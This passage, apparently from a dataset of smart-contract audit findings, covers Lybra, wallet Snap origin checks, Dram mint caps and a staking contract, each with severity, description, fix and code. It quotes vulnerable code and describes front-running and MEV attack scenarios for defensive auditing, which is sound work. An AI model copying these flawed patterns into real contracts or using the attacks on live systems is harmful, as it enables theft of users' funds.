reward2keeper);\\n}\\n```\\n\\nIn fact, this is a design choice of the system to treat the allowance to the vault as an agreement to become a public provider of debt tokens for the liquidation process. 
It is important to note that there are incentives associated with being a provider as they get the collateral asset at a discount.\\nHowever, it is not obvious from the documentation at the time of the audit, nor from the code, that an address having a non-zero `EUSD` allowance for the vault automatically allows other users to use that address as a provider. Indeed, many general-purpose liquidator bots use their tokens during liquidations, using the same address for both the liquidator and the provider. As a result, this would put that address at the mercy of any other user who would want to utilize these tokens in liquidations. The user might not be comfortable doing this trade in any case, even at a discount.\\nIn fact, due to this mechanism, even during consciously initiated liquidations MEV bots could spot this opportunity and front-run the liquidator's transaction. A frontrunner could put themselves as the keeper and the original user as the provider, grabbing the `reward2keeper` fee and leaving the original address with fewer rewards and wasted gas after the liquidation.чWhile the mechanism is understood to be done for convenience and access to liquidity as a design decision, this could put unaware users in unfortunate situations of having performed a trade without explicit consent. Specifically, the MEV attack vector could be executed and repeated without fail by a capable actor monitoring the mempool. Consider having a separate, explicit flag for allowing others to use a user's tokens during liquidation, thus also accommodating solo liquidators by removing the MEV attack vector. 
Consider explicitly mentioning these mechanisms in the documentation as well.чч```\\nfunction liquidation(address provider, address onBehalfOf, uint256 assetAmount) external virtual {\\n uint256 assetPrice = getAssetPrice();\\n uint256 onBehalfOfCollateralRatio = (depositedAsset[onBehalfOf] \\* assetPrice \\* 100) / borrowed[onBehalfOf];\\n require(onBehalfOfCollateralRatio < badCollateralRatio, \"Borrowers collateral ratio should below badCollateralRatio\");\\n\\n require(assetAmount \\* 2 <= depositedAsset[onBehalfOf], \"a max of 50% collateral can be liquidated\");\\n require(EUSD.allowance(provider, address(this)) != 0, \"provider should authorize to provide liquidation EUSD\");\\n uint256 eusdAmount = (assetAmount \\* assetPrice) / 1e18;\\n\\n \\_repay(provider, onBehalfOf, eusdAmount);\\n uint256 reducedAsset = assetAmount \\* 11 / 10;\\n totalDepositedAsset -= reducedAsset;\\n depositedAsset[onBehalfOf] -= reducedAsset;\\n uint256 reward2keeper;\\n if (provider == msg.sender) {\\n collateralAsset.safeTransfer(msg.sender, reducedAsset);\\n } else {\\n reward2keeper = (reducedAsset \\* configurator.vaultKeeperRatio(address(this))) / 110;\\n collateralAsset.safeTransfer(provider, reducedAsset - reward2keeper);\\n collateralAsset.safeTransfer(msg.sender, reward2keeper);\\n }\\n emit LiquidationRecord(provider, msg.sender, onBehalfOf, eusdAmount, reducedAsset, reward2keeper, false, block.timestamp);\\n}\\n```\\n -Use the Same Solidity Version Across Contracts.чlowчMost contracts use the same Solidity version with `pragma solidity ^0.8.17`. 
The only exception is the `StakingRewardsV2` contract which has `pragma solidity ^0.8`.\\n```\\npragma solidity ^0.8;\\n```\\nчIf all contracts will be tested and utilized together, it would be best to utilize and document the same version within all contract code to avoid any issues and inconsistencies that may arise across Solidity versions.чч```\\npragma solidity ^0.8;\\n```\\n -Missing Events.чlowчIn a few cases in the Lybra Protocol system, there are contracts that are missing events in significant scenarios, such as important configuration changes like a price oracle change. Consider implementing more events in the below examples.\\nNo events in the contract:\\n```\\ncontract esLBRBoost is Ownable {\\n esLBRLockSetting[] public esLBRLockSettings;\\n mapping(address => LockStatus) public userLockStatus;\\n IMiningIncentives public miningIncentives;\\n\\n // Define a struct for the lock settings\\n struct esLBRLockSetting {\\n uint256 duration;\\n uint256 miningBoost;\\n }\\n\\n // Define a struct for the user's lock status\\n struct LockStatus {\\n uint256 lockAmount;\\n uint256 unlockTime;\\n uint256 duration;\\n uint256 miningBoost;\\n }\\n\\n // Constructor to initialize the default lock settings\\n constructor(address \\_miningIncentives) {\\n```\\n\\nMissing an event during a premature unlock:\\n```\\nfunction unlockPrematurely() external {\\n require(block.timestamp + exitCycle - 3 days > time2fullRedemption[msg.sender], \"ENW\");\\n uint256 burnAmount = getReservedLBRForVesting(msg.sender) - getPreUnlockableAmount(msg.sender);\\n uint256 amount = getPreUnlockableAmount(msg.sender) + getClaimAbleLBR(msg.sender);\\n if (amount > 0) {\\n LBR.mint(msg.sender, amount);\\n }\\n unstakeRatio[msg.sender] = 0;\\n time2fullRedemption[msg.sender] = 0;\\n grabableAmount += burnAmount;\\n}\\n```\\n\\nMissing events for setting important configurations such as `setToken`, `setLBROracle`, and setPools:\\n```\\nfunction setToken(address \\_lbr, address \\_eslbr) 
external onlyOwner {\\n LBR = \\_lbr;\\n esLBR = \\_eslbr;\\n}\\n\\nfunction setLBROracle(address \\_lbrOracle) external onlyOwner {\\n lbrPriceFeed = AggregatorV3Interface(\\_lbrOracle);\\n}\\n\\nfunction setPools(address[] memory \\_vaults) external onlyOwner {\\n require(\\_vaults.length <= 10, \"EL\");\\n for (uint i = 0; i < \\_vaults.length; i++) {\\n require(configurator.mintVault(\\_vaults[i]), \"NOT\\_VAULT\");\\n }\\n vaults = \\_vaults;\\n}\\n```\\n\\nMissing events for setting important configurations such as `setRewardsDuration` and setBoost:\\n```\\n// Allows the owner to set the rewards duration\\nfunction setRewardsDuration(uint256 \\_duration) external onlyOwner {\\n require(finishAt < block.timestamp, \"reward duration not finished\");\\n duration = \\_duration;\\n}\\n\\n// Allows the owner to set the boost contract address\\nfunction setBoost(address \\_boost) external onlyOwner {\\n esLBRBoost = IesLBRBoost(\\_boost);\\n}\\n```\\n\\nMissing event during what is essentially staking `LBR` into `esLBR` (such as in ProtocolRewardsPool.stake()). 
Consider an appropriate event here such as StakeLBR:\\n```\\nif(useLBR) {\\n IesLBR(miningIncentives.LBR()).burn(msg.sender, lbrAmount);\\n IesLBR(miningIncentives.esLBR()).mint(msg.sender, lbrAmount);\\n}\\n```\\nчImplement additional events as appropriate.чч```\\ncontract esLBRBoost is Ownable {\\n esLBRLockSetting[] public esLBRLockSettings;\\n mapping(address => LockStatus) public userLockStatus;\\n IMiningIncentives public miningIncentives;\\n\\n // Define a struct for the lock settings\\n struct esLBRLockSetting {\\n uint256 duration;\\n uint256 miningBoost;\\n }\\n\\n // Define a struct for the user's lock status\\n struct LockStatus {\\n uint256 lockAmount;\\n uint256 unlockTime;\\n uint256 duration;\\n uint256 miningBoost;\\n }\\n\\n // Constructor to initialize the default lock settings\\n constructor(address \\_miningIncentives) {\\n```\\n -Incorrect InterfacesчlowчIn a few cases, incorrect interfaces are used on top of contracts. Though the effect is the same as the contracts are just tokens and follow the same interfaces, it is best practice to implement correct interfaces.\\n`IPeUSD` is used instead of `IEUSD`\\n```\\nIPeUSD public EUSD;\\n```\\n\\n`IPeUSD` is used instead of `IEUSD`\\n```\\nif (address(EUSD) == address(0)) EUSD = IPeUSD(\\_eusd);\\n```\\n\\n`IesLBR` instead of `ILBR`\\n```\\nIesLBR public LBR;\\n```\\n\\n`IesLBR` instead of `ILBR`\\n```\\nLBR = IesLBR(\\_lbr);\\n```\\nчImplement correct interfaces for consistency.чч```\\nIPeUSD public EUSD;\\n```\\n -Production Builds Allow Development and Localhost Origins; Snap Does Not Enforce Transport SecurityчmediumчThe snaps RPC access is restricted to certain origins only. 
However, there is no logic that disables development/test domains from origin checks in production builds.\\nSolflare Snap\\n../solflare-snap/src/index.js:L7-L17\\n```\\nmodule.exports.onRpcRequest = async ({ origin, request }) => {\\n if (\\n !origin ||\\n (\\n !origin.match(/^https?:\\/\\/localhost:[0-9]{1,4}$/) &&\\n !origin.match(/^https?:\\/\\/(?:\\S+\\.)?solflare\\.com$/) &&\\n !origin.match(/^https?:\\/\\/(?:\\S+\\.)?solflare\\.dev$/)\\n )\\n ) {\\n throw new Error('Invalid origin');\\n }\\n```\\n\\nAptos Snap\\n../aptos-snap/src/index.js:L6-L15\\n```\\nmodule.exports.onRpcRequest = async ({ origin, request }) => {\\n if (\\n !origin ||\\n (\\n !origin.match(/^https?:\\/\\/localhost:[0-9]{1,4}$/) &&\\n !origin.match(/^https?:\\/\\/(?:\\S+\\.)?risewallet\\.dev$/)\\n )\\n ) {\\n throw new Error('Invalid origin');\\n }\\n```\\n\\nSui Snap\\n../sui-snap/src/index.js:L8-L17\\n```\\nmodule.exports.onRpcRequest = async ({ origin, request }) => {\\n if (\\n !origin ||\\n (\\n !origin.match(/^https?:\\/\\/localhost:[0-9]{1,4}$/) &&\\n !origin.match(/^https?:\\/\\/(?:\\S+\\.)?elliwallet\\.dev$/)\\n )\\n ) {\\n throw new Error('Invalid origin');\\n }\\n```\\nчImplement logic that removes development/localhost origin from the allow list for production builds. Employ strict checks on the format of provided origin. Do not by default allow all subdomains.чч```\\nmodule.exports.onRpcRequest = async ({ origin, request }) => {\\n if (\\n !origin ||\\n (\\n !origin.match(/^https?:\\/\\/localhost:[0-9]{1,4}$/) &&\\n !origin.match(/^https?:\\/\\/(?:\\S+\\.)?solflare\\.com$/) &&\\n !origin.match(/^https?:\\/\\/(?:\\S+\\.)?solflare\\.dev$/)\\n )\\n ) {\\n throw new Error('Invalid origin');\\n }\\n```\\n -Production Builds Allow Development and Localhost Origins; Snap Does Not Enforce Transport Security Partially AddressedчmediumчThe snaps RPC access is restricted to certain origins only. 
However, there is no logic that disables development/test domains from origin checks in production builds.\\nSolflare Snap\\n../solflare-snap/src/index.js:L7-L17\\n```\\nmodule.exports.onRpcRequest = async ({ origin, request }) => {\\n if (\\n !origin ||\\n (\\n !origin.match(/^https?:\\/\\/localhost:[0-9]{1,4}$/) &&\\n !origin.match(/^https?:\\/\\/(?:\\S+\\.)?solflare\\.com$/) &&\\n !origin.match(/^https?:\\/\\/(?:\\S+\\.)?solflare\\.dev$/)\\n )\\n ) {\\n throw new Error('Invalid origin');\\n }\\n```\\n\\nAptos Snap\\n../aptos-snap/src/index.js:L6-L15\\n```\\nmodule.exports.onRpcRequest = async ({ origin, request }) => {\\n if (\\n !origin ||\\n (\\n !origin.match(/^https?:\\/\\/localhost:[0-9]{1,4}$/) &&\\n !origin.match(/^https?:\\/\\/(?:\\S+\\.)?risewallet\\.dev$/)\\n )\\n ) {\\n throw new Error('Invalid origin');\\n }\\n```\\n\\nSui Snap\\n../sui-snap/src/index.js:L8-L17\\n```\\nmodule.exports.onRpcRequest = async ({ origin, request }) => {\\n if (\\n !origin ||\\n (\\n !origin.match(/^https?:\\/\\/localhost:[0-9]{1,4}$/) &&\\n !origin.match(/^https?:\\/\\/(?:\\S+\\.)?elliwallet\\.dev$/)\\n )\\n ) {\\n throw new Error('Invalid origin');\\n }\\n```\\nчResolution\\nThe client has issued the following statement:\\nChangesets:\\nsolflare-wallet/solflare-snap@749d2b0\\nsolflare-wallet/aptos-snap@eef10b5\\nsolflare-wallet/sui-snap@898295f\\nStatement from the Assessment Team:\\nImplement logic that removes development/localhost origin from the allow list for production builds. Employ strict checks on the format of provided origin. 
Do not by default allow all subdomains.чч```\\nmodule.exports.onRpcRequest = async ({ origin, request }) => {\\n if (\\n !origin ||\\n (\\n !origin.match(/^https?:\\/\\/localhost:[0-9]{1,4}$/) &&\\n !origin.match(/^https?:\\/\\/(?:\\S+\\.)?solflare\\.com$/) &&\\n !origin.match(/^https?:\\/\\/(?:\\S+\\.)?solflare\\.dev$/)\\n )\\n ) {\\n throw new Error('Invalid origin');\\n }\\n```\\n -All Roles Are Set to the Same Account.чlowчFrom talking to the team we know that all roles will be held by different timelock contracts. In the code they all are initialized to the same `admin` address. That would mean that most roles would need to be transferred. Given that each transfer takes 2 transactions and there are 3 roles to transfer that would equate to 6 transactions just to properly set up the contract on deployment. That also increases the time it would take and the room for making errors.\\nIt should also be noted that the `regulator` role is not being initialized there at all.\\n```\\n// solhint-disable-next-line func-name-mixedcase\\nfunction \\_\\_DramAccessControl\\_init\\_unchained(\\n address admin\\n) internal onlyInitializing {\\n \\_grantRole(ADMIN\\_ROLE, admin);\\n \\_grantRole(ROLE\\_MANAGER\\_ROLE, admin);\\n \\_grantRole(SUPPLY\\_MANAGER\\_ROLE, admin);\\n}\\n```\\nчResolution\\nAll roles, including regulatory manager, are now set to different accounts. The modification can be found in commit `b70348e6998e35282212243ea639d174ced1ef2d`\\nWe suggest passing several addresses into the constructor and setting them to the correct addresses right away. 
Alternatively one can not set them at all and grant those roles later in order to avoid revoking the roles that admin should not have, such as `SUPPLY_MANAGER_ROLE`.чч```\\n// solhint-disable-next-line func-name-mixedcase\\nfunction \\_\\_DramAccessControl\\_init\\_unchained(\\n address admin\\n) internal onlyInitializing {\\n \\_grantRole(ADMIN\\_ROLE, admin);\\n \\_grantRole(ROLE\\_MANAGER\\_ROLE, admin);\\n \\_grantRole(SUPPLY\\_MANAGER\\_ROLE, admin);\\n}\\n```\\n -Setting MintCap to a Specific Value Is Prone to Front-Running.чlowч`Dram` stable coin is using the approval-like model to set the minting caps of different operators, thus it is prone to the same front-run issues as the approval mechanism. When using the `setMintCap` function directly operator could front-run the transaction and completely spend the old cap and then spend the new one again after setting the transaction goes through.\\n```\\nfunction setMintCap(\\n address operator,\\n uint256 amount\\n) external onlyRoleOrAdmin(ROLE\\_MANAGER\\_ROLE) {\\n \\_setMintCap(operator, amount);\\n}\\n```\\n\\nImagine the following scenario:\\nAlice has a mint cap of 10.\\nA transaction is sent to the mem-pool to set it to 5 (decrease the cap). The intent is that Alice should only be able to mint 5 tokens.\\nAlice frontruns this transaction and mints 10 tokens.\\nOnce transaction 2 goes through Alice mints 5 more tokens.\\nIn total Alice minted 15 tokens.чAvoid using setting the specific mint caps and rather use increase/decrease methods that are present in the code already.чч```\\nfunction setMintCap(\\n address operator,\\n uint256 amount\\n) external onlyRoleOrAdmin(ROLE\\_MANAGER\\_ROLE) {\\n \\_setMintCap(operator, amount);\\n}\\n```\\n -Incorrect Priviliges setOperatorAddresses AcknowledgedчhighчThe function `setOperatorAddresses` instead of allowing the Operator to update its own, as well as the Fee Recipient address, incorrectly provides the privileges to the Fee Recipient. 
As a result, the Fee Recipient can modify the operator address as and when needed, to DoS the operator and exploit the system. Additionally, upon reviewing the documentation, we found that there are no administrative rights defined for the Fee Recipient, hence highlighting the incorrect privilege allocation.\\n```\\nfunction setOperatorAddresses(\\n uint256 \\_operatorIndex,\\n address \\_operatorAddress,\\n address \\_feeRecipientAddress\\n) external onlyActiveOperatorFeeRecipient(\\_operatorIndex) {\\n \\_checkAddress(\\_operatorAddress);\\n \\_checkAddress(\\_feeRecipientAddress);\\n StakingContractStorageLib.OperatorsSlot storage operators = StakingContractStorageLib.getOperators();\\n\\n operators.value[\\_operatorIndex].operator = \\_operatorAddress;\\n operators.value[\\_operatorIndex].feeRecipient = \\_feeRecipientAddress;\\n emit ChangedOperatorAddresses(\\_operatorIndex, \\_operatorAddress, \\_feeRecipientAddress);\\n}\\n```\\nчThe modifier should be `onlyActiveOperatorOrAdmin` allowing only the operator itself or admin of the system, to update the necessary addresses.\\nAlso, for transferring crucial privileges from one address to another, the operator's address should follow a 2-step approach like transferring ownership.чч```\\nfunction setOperatorAddresses(\\n uint256 \\_operatorIndex,\\n address \\_operatorAddress,\\n address \\_feeRecipientAddress\\n) external onlyActiveOperatorFeeRecipient(\\_operatorIndex) {\\n \\_checkAddress(\\_operatorAddress);\\n \\_checkAddress(\\_feeRecipientAddress);\\n StakingContractStorageLib.OperatorsSlot storage operators = StakingContractStorageLib.getOperators();\\n\\n operators.value[\\_operatorIndex].operator = \\_operatorAddress;\\n operators.value[\\_operatorIndex].feeRecipient = \\_feeRecipientAddress;\\n emit ChangedOperatorAddresses(\\_operatorIndex, \\_operatorAddress, \\_feeRecipientAddress);\\n}\\n```\\n -Unconstrained Snapshot While Setting Operator LimitчmediumчFunction `setOperatorLimit` as the name says, 
allows the `SYS_ADMIN` to set/update the staking limit for an operator. The function ensures that if the limit is being increased, the `_snapshot` must be ahead of the last validator edit(block.number at which the last validator edit occurred). However, the parameter `_snapshot` is unconstrained and can be any number. Also, the functions `addValidators` and `removeValidators` update the `block.number` signifying the last validator edit, but never constrain the new edits with it. Since there are no publicly available functions to access this value, makes the functionality even more confusing and may be unnecessary.\\n```\\nif (\\n operators.value[\\_operatorIndex].limit < \\_limit &&\\n StakingContractStorageLib.getLastValidatorEdit() > \\_snapshot\\n) {\\n revert LastEditAfterSnapshot();\\n}\\n```\\nчIf the functionality is not needed, consider removing it. Otherwise, add some necessary logic to either constrain the last validator edit or add public functions for the users to access it.чч```\\nif (\\n operators.value[\\_operatorIndex].limit < \\_limit &&\\n StakingContractStorageLib.getLastValidatorEdit() > \\_snapshot\\n) {\\n revert LastEditAfterSnapshot();\\n}\\n```\\n -Hardcoded Operator Limit LogicчmediumчThe contract defines some hardcoded limits which is not the right approach for upgradeable contracts and opens doors for accidental mistakes, if not handled with care.\\nThe operators for the current version are limited to 1. 
If the auditee team decides to open the system to work with more operators but fails to change the limit while upgrading, the upgraded contract will have no effect, and will still disallow any more operators to be added.\\n```\\nfunction addOperator(address \\_operatorAddress, address \\_feeRecipientAddress) external onlyAdmin returns (uint256) {\\n StakingContractStorageLib.OperatorsSlot storage operators = StakingContractStorageLib.getOperators();\\n StakingContractStorageLib.OperatorInfo memory newOperator;\\n\\n if (operators.value.length == 1) {\\n revert MaximumOperatorCountAlreadyReached();\\n }\\n```\\n\\nAlso, the function `_depositOnOneOperator` hardcodes the operator Index as 0 since the contract only supports one operator.\\n```\\nfunction \\_depositOnOneOperator(uint256 \\_depositCount, uint256 \\_totalAvailableValidators) internal {\\n StakingContractStorageLib.setTotalAvailableValidators(\\_totalAvailableValidators - \\_depositCount);\\n \\_depositValidatorsOfOperator(0, \\_depositCount);\\n}\\n```\\nчA better approach could be to constrain the limit of operators that can be added with a storage variable or constant, provided at the time of contract initialization. The contract should also consider supporting dynamic operator deposits for future versions instead of the default hardcoded index.чч```\\nfunction addOperator(address \\_operatorAddress, address \\_feeRecipientAddress) external onlyAdmin returns (uint256) {\\n StakingContractStorageLib.OperatorsSlot storage operators = StakingContractStorageLib.getOperators();\\n StakingContractStorageLib.OperatorInfo memory newOperator;\\n\\n if (operators.value.length == 1) {\\n revert MaximumOperatorCountAlreadyReached();\\n }\\n```\\n -StakingContract - PubKey Length Checks Not Always Enforcedчmediumч`addValidators` checks that the provided `bytes pubKey` is a multiple of the expected pubkey length while functions like `setWithdrawer` do not enforce similar length checks. 
This is an inconsistency that should be avoided.\\n`addValidators` enforcing input length checks\\n```\\nfunction addValidators(\\n uint256 \\_operatorIndex,\\n uint256 \\_keyCount,\\n bytes calldata \\_publicKeys,\\n bytes calldata \\_signatures\\n) external onlyActiveOperator(\\_operatorIndex) {\\n if (\\_keyCount == 0) {\\n revert InvalidArgument();\\n }\\n\\n if (\\_publicKeys.length % PUBLIC\\_KEY\\_LENGTH != 0 || \\_publicKeys.length / PUBLIC\\_KEY\\_LENGTH != \\_keyCount) {\\n revert InvalidPublicKeys();\\n }\\n```\\n\\n`setWithdrawer` accepting any length for a `pubKey`. Note that `_getPubKeyRoot` will take any input provided and concat it the zero bytes.\\n```\\n/// @notice Set withdrawer for public key\\n/// @dev Only callable by current public key withdrawer\\n/// @param \\_publicKey Public key to change withdrawer\\n/// @param \\_newWithdrawer New withdrawer address\\nfunction setWithdrawer(bytes calldata \\_publicKey, address \\_newWithdrawer) external {\\n if (!StakingContractStorageLib.getWithdrawerCustomizationEnabled()) {\\n revert Forbidden();\\n }\\n \\_checkAddress(\\_newWithdrawer);\\n bytes32 pubkeyRoot = \\_getPubKeyRoot(\\_publicKey);\\n StakingContractStorageLib.WithdrawersSlot storage withdrawers = StakingContractStorageLib.getWithdrawers();\\n\\n if (withdrawers.value[pubkeyRoot] != msg.sender) {\\n revert Unauthorized();\\n }\\n\\n emit ChangedWithdrawer(\\_publicKey, \\_newWithdrawer);\\n\\n withdrawers.value[pubkeyRoot] = \\_newWithdrawer;\\n}\\n```\\n\\n```\\nfunction \\_getPubKeyRoot(bytes memory \\_publicKey) internal pure returns (bytes32) {\\n return sha256(abi.encodePacked(\\_publicKey, bytes16(0)));\\n}\\n```\\n\\nsimilarly, the withdraw family of functions does not enforce a pubkey length either. 
However, it is unlikely that someone finds a pubkey that matches a root for the attackers address.\\n```\\n/// @notice Withdraw the Execution Layer Fee for a given validator public key\\n/// @dev Funds are sent to the withdrawer account\\n/// @param \\_publicKey Validator to withdraw Execution Layer Fees from\\nfunction withdrawELFee(bytes calldata \\_publicKey) external {\\n \\_onlyWithdrawerOrAdmin(\\_publicKey);\\n \\_deployAndWithdraw(\\_publicKey, EXECUTION\\_LAYER\\_SALT\\_PREFIX, StakingContractStorageLib.getELDispatcher());\\n}\\n```\\n\\nNevertheless, the methods should be hardened so as not to give a malicious actor the freedom to use an unexpected input size for the `pubKey` argument.чEnforce pubkey length checks when accepting a single pubkey as bytes similar to the batch functions that check for a multiple of ´PUBLIC_KEY_LENGTH´. Alternatively, declare the function argument as `bytes48` (however, in this case inputs may be auto-padded to fit the expected length, pot. covering situations that otherwise would throw an error)чч```\\nfunction addValidators(\\n uint256 \\_operatorIndex,\\n uint256 \\_keyCount,\\n bytes calldata \\_publicKeys,\\n bytes calldata \\_signatures\\n) external onlyActiveOperator(\\_operatorIndex) {\\n if (\\_keyCount == 0) {\\n revert InvalidArgument();\\n }\\n\\n if (\\_publicKeys.length % PUBLIC\\_KEY\\_LENGTH != 0 || \\_publicKeys.length / PUBLIC\\_KEY\\_LENGTH != \\_keyCount) {\\n revert InvalidPublicKeys();\\n }\\n```\\n -Unpredictable Behavior Due to Admin Front Running or General Bad TimingчmediumчIn a number of cases, administrators of contracts can update or upgrade things in the system without warning. 
This has the potential to violate a security goal of the system.\\nSpecifically, privileged roles could use front running to make malicious changes just ahead of incoming transactions, or purely accidental negative effects could occur due to the unfortunate timing of changes.\\nSome instances of this are more important than others, but in general, users of the system should have assurances about the behavior of the action they're about to take.\\nUpgradeable TU proxy\\nFee changes take effect immediately\\n```\\n/// @notice Change the Operator fee\\n/// @param \\_operatorFee Fee in Basis Point\\nfunction setOperatorFee(uint256 \\_operatorFee) external onlyAdmin {\\n if (\\_operatorFee > StakingContractStorageLib.getOperatorCommissionLimit()) {\\n revert InvalidFee();\\n }\\n StakingContractStorageLib.setOperatorFee(\\_operatorFee);\\n emit ChangedOperatorFee(\\_operatorFee);\\n}\\n```\\n\\n```\\n/// @notice Change the Global fee\\n/// @param \\_globalFee Fee in Basis Point\\nfunction setGlobalFee(uint256 \\_globalFee) external onlyAdmin {\\n if (\\_globalFee > StakingContractStorageLib.getGlobalCommissionLimit()) {\\n revert InvalidFee();\\n }\\n StakingContractStorageLib.setGlobalFee(\\_globalFee);\\n emit ChangedGlobalFee(\\_globalFee);\\n}\\n```\\nчThe underlying issue is that users of the system can't be sure what the behavior of a function call will be, and this is because the behavior can change at any time.\\nWe recommend giving the user advance notice of changes with a time lock. For example, make all upgrades require two steps with a mandatory time window between them. 
The first step merely broadcasts to users that a particular change is coming, and the second step commits that change after a suitable waiting period.чч```\\n/// @notice Change the Operator fee\\n/// @param \\_operatorFee Fee in Basis Point\\nfunction setOperatorFee(uint256 \\_operatorFee) external onlyAdmin {\\n if (\\_operatorFee > StakingContractStorageLib.getOperatorCommissionLimit()) {\\n revert InvalidFee();\\n }\\n StakingContractStorageLib.setOperatorFee(\\_operatorFee);\\n emit ChangedOperatorFee(\\_operatorFee);\\n}\\n```\\n -Potentially Uninitialized ImplementationsчmediumчMost contracts in the system are meant to be used with a proxy pattern. First, the implementations are deployed, and then proxies are deployed that delegatecall into the respective implementations following an initialization call (hardhat, with same transaction). However, the implementations are neither initialized explicitly nor are they protected from other actors claiming/initializing them. This allows anyone to call initialization functions on implementations for use with phishing attacks (i.e. contract implementation addresses are typically listed on the official project website as valid contracts) which may affect the reputation of the system.\\nNone of the implementations allow unprotected delegatecalls or selfdestructs. 
lowering the severity of this finding.\\n```\\nfunction initialize\\_1(\\n address \\_admin,\\n address \\_treasury,\\n address \\_depositContract,\\n address \\_elDispatcher,\\n address \\_clDispatcher,\\n address \\_feeRecipientImplementation,\\n uint256 \\_globalFee,\\n uint256 \\_operatorFee,\\n uint256 globalCommissionLimitBPS,\\n uint256 operatorCommissionLimitBPS\\n) external init(1) {\\n```\\n\\n```\\n/// @notice Initializes the receiver\\n/// @param \\_dispatcher Address that will handle the fee dispatching\\n/// @param \\_publicKeyRoot Public Key root assigned to this receiver\\nfunction init(address \\_dispatcher, bytes32 \\_publicKeyRoot) external {\\n if (initialized) {\\n revert AlreadyInitialized();\\n }\\n initialized = true;\\n dispatcher = IFeeDispatcher(\\_dispatcher);\\n publicKeyRoot = \\_publicKeyRoot;\\n stakingContract = msg.sender; // The staking contract always calls init\\n}\\n```\\n\\n```\\n/// @param \\_publicKeyRoot Public Key root assigned to this receiver\\nfunction init(address \\_dispatcher, bytes32 \\_publicKeyRoot) external {\\n if (initialized) {\\n revert AlreadyInitialized();\\n }\\n initialized = true;\\n dispatcher = IFeeDispatcher(\\_dispatcher);\\n publicKeyRoot = \\_publicKeyRoot;\\n}\\n```\\nчPetrify contracts in the constructor and disallow other actors from claiming/initializing the implementations.чч```\\nfunction initialize\\_1(\\n address \\_admin,\\n address \\_treasury,\\n address \\_depositContract,\\n address \\_elDispatcher,\\n address \\_clDispatcher,\\n address \\_feeRecipientImplementation,\\n uint256 \\_globalFee,\\n uint256 \\_operatorFee,\\n uint256 globalCommissionLimitBPS,\\n uint256 operatorCommissionLimitBPS\\n) external init(1) {\\n```\\n -Operator May DoS the Withdrawal or Make It More ExpensiveчmediumчWhile collecting fees, the operator may:\\ncause DoS for the funds/rewards withdrawal by reverting the call, thus reverting the whole transaction. 
By doing this, it won't be receiving any rewards, but neither will the treasury and withdrawer.\\nmake the withdrawal more expensive by sending a huge chunk of `returndata`. As the `returndata` is copied into memory in the caller's context, it will add an extra gas overhead for the withdrawer making it more expensive.\\nor mint gas token\\n```\\nif (operatorFee > 0) {\\n (status, data) = operator.call{value: operatorFee}(\"\");\\n if (status == false) {\\n revert FeeRecipientReceiveError(data);\\n }\\n}\\n```\\nчA possible solution could be to make a low-level call in an inline assembly block, restricting the `returndata` to a couple of bytes, and instead of reverting on the failed call, emit an event, flagging the call that failed.чч```\\nif (operatorFee > 0) {\\n (status, data) = operator.call{value: operatorFee}(\"\");\\n if (status == false) {\\n revert FeeRecipientReceiveError(data);\\n }\\n}\\n```\\n -ConsensusLayerFeeDispatcher/ExecutionLayerFeeDispatcher - Should Hardcode autoPetrify With Highest Initializable Version Instead of User Provided ArgumentчlowчThe version to auto-initialize is not hardcoded with the constructor. 
On deployment, the deployer may accidentally use the wrong version, allowing anyone to call `initialize` on the contract.\\n```\\n/// @notice Constructor method allowing us to prevent calls to initCLFR by setting the appropriate version\\nconstructor(uint256 \\_version) {\\n VERSION\\_SLOT.setUint256(\\_version);\\n}\\n```\\n\\n```\\n/// @notice Constructor method allowing us to prevent calls to initCLFR by setting the appropriate version\\nconstructor(uint256 \\_version) {\\n VERSION\\_SLOT.setUint256(\\_version);\\n}\\n\\n/// @notice Initialize the contract by storing the staking contract and the public key in storage\\n/// @param \\_stakingContract Address of the Staking Contract\\nfunction initELD(address \\_stakingContract) external init(1) {\\n STAKING\\_CONTRACT\\_ADDRESS\\_SLOT.setAddress(\\_stakingContract);\\n}\\n```\\nчSimilar to the `init(1)` modifier, it is suggested to track the highest version as a `const int` with the contract and auto-initialize to the highest version in the constructor instead of taking the highest version as a deployment argument.чч```\\n/// @notice Constructor method allowing us to prevent calls to initCLFR by setting the appropriate version\\nconstructor(uint256 \\_version) {\\n VERSION\\_SLOT.setUint256(\\_version);\\n}\\n```\\n -StakingContract - Misleading CommentчlowчThe comment notes that the expected caller is `admin` while the modifier checks that `msg.sender` is an active operator.\\n```\\n/// @notice Ensures that the caller is the admin\\nmodifier onlyActiveOperator(uint256 \\_operatorIndex) {\\n \\_onlyActiveOperator(\\_operatorIndex);\\n \\_;\\n}\\n```\\nчRectify the comment to accurately describe the intention of the method/modifier.чч```\\n/// @notice Ensures that the caller is the admin\\nmodifier onlyActiveOperator(uint256 \\_operatorIndex) {\\n \\_onlyActiveOperator(\\_operatorIndex);\\n \\_;\\n}\\n```\\n -Impractical Checks for Global/Operator Fees and the Commission LimitsчlowчThe contract initialization sets 
up the global and operator fees and also their commission limits. However, the checks just make sure that the fees or commission limit is up to 100% which is not a very practical check. Any unusual value, for instance, if set to 100% will mean the whole rewards/funds will be non-exempted and taxed as global fees, which we believe will never be a case practically.\\n```\\nif (\\_globalFee > BASIS\\_POINTS) {\\n revert InvalidFee();\\n}\\nStakingContractStorageLib.setGlobalFee(\\_globalFee);\\nif (\\_operatorFee > BASIS\\_POINTS) {\\n revert InvalidFee();\\n}\\nStakingContractStorageLib.setOperatorFee(\\_operatorFee);\\n```\\n\\n```\\nfunction initialize\\_2(uint256 globalCommissionLimitBPS, uint256 operatorCommissionLimitBPS) public init(2) {\\n if (globalCommissionLimitBPS > BASIS\\_POINTS) {\\n revert InvalidFee();\\n }\\n StakingContractStorageLib.setGlobalCommissionLimit(globalCommissionLimitBPS);\\n if (operatorCommissionLimitBPS > BASIS\\_POINTS) {\\n revert InvalidFee();\\n }\\n StakingContractStorageLib.setOperatorCommissionLimit(operatorCommissionLimitBPS);\\n}\\n```\\n\\n```\\nfunction setGlobalFee(uint256 \\_globalFee) external onlyAdmin {\\n if (\\_globalFee > StakingContractStorageLib.getGlobalCommissionLimit()) {\\n revert InvalidFee();\\n }\\n StakingContractStorageLib.setGlobalFee(\\_globalFee);\\n emit ChangedGlobalFee(\\_globalFee);\\n}\\n```\\n\\n```\\nfunction setOperatorFee(uint256 \\_operatorFee) external onlyAdmin {\\n if (\\_operatorFee > StakingContractStorageLib.getOperatorCommissionLimit()) {\\n revert InvalidFee();\\n }\\n StakingContractStorageLib.setOperatorFee(\\_operatorFee);\\n emit ChangedOperatorFee(\\_operatorFee);\\n}\\n```\\nчThe fees should be checked with a more practical limit. 
